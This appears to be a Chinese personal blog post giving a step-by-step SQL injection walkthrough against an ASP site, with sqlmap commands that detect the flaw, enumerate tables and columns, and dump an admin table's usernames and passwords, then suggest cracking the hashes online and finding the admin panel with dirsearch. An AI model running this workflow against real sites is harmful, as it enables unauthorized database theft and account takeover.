歌曲封面 未知作品

网站已运行 1 年 172 天 14 小时 58 分

Powered by Typecho & Sunny

102 online · 47 ms

歌曲封面 未知作品

网站已运行 1 年 172 天 14 小时 58 分

Powered by Typecho & Sunny

104 online · 55 ms

小野博客 小野(Hirono)博客的个人网站,主要讲述关于小野的一些陈芝麻烂谷子事。网络、生活、我的主张,也是一个自留地
Title

0x01 APS.NET网站注入渗透测试

小野

·

·

97次阅读
Article

特殊说明:本文档以技术角度出发,勿用于非法用途。

我们以ASP网站为例,对网站的安全进行渗透测试。
所使用的方法是SQL注入,在渗透测试之前准备好测试的网站以及自动化工具

SQLMAP自动化注入检测

♾️ text 代码:
# 检测是否存在SQL注入漏洞(这里将网址替换为XXX)
# -u 参数为后根网站URL
sqlmap -u "http://www.xxx.com/bxnews.asp?id=1150"

在检测结果后,如果出现操作系统及数据库信息时,说明我们找到了合适的目标,如下图所示:
1.png
web server operating system: Windows 7 or 2008 R2 操作系统类型
web application technology: ASP, Microsoft IIS 7.5, ASP.NET 开发语言
back-end DBMS: Microsoft Access 数据库类型

然后通过枚举方法进行数据库名称的猜测撞库。

♾️ text 代码:
# 枚举数据库名称(这里将网址替换为XXX)
# --tables 标记为数据库名称
sqlmap -u "http://www.xxx.com/bxnews.asp?id=1150" --tables
2.png

图中可以看出,我们已经找到表名[admin],可在其中选择认为有意义的表名。然后接就是对表中列进行枚举。

♾️ text 代码:
# 枚举字段(这里将网址替换为XXX)
sqlmap -u "http://www.xxx.com/bxnews.asp?id=1150" --columns -T "admin"
2024-08-12_063433.png

在图中看到存在的敏感字段。接下来我们就继续查看详细的内容。

♾️ text 代码:
# 查看帐户信息(这里将网址替换为XXX)
sqlmap -u "http://www.xxx.com/bxnews.asp?id=1150" --dump -C "admin,password,user" -T "admin"
3.png

可以看出,密码是经过加密的,我们可以到某些cmd5网站在线破解。

最后通过dirsearch扫出后台地址。
4.png


现在已有 1 条评论,7 人点赞

广告

页底广告 页底广告
Comment:共1条
发表
  1. 头像
    @

    博主

    小野
    勿用于非法用途!!!😆
    · Windows · Chrome · 中国浙江省联通
搜 索 消 息 足 迹
你还不曾留言过..
你还不曾留下足迹..
博主 网站设置有【CDN】缓存,留言等评论内容需要12小时才能显示! 不再显示
博主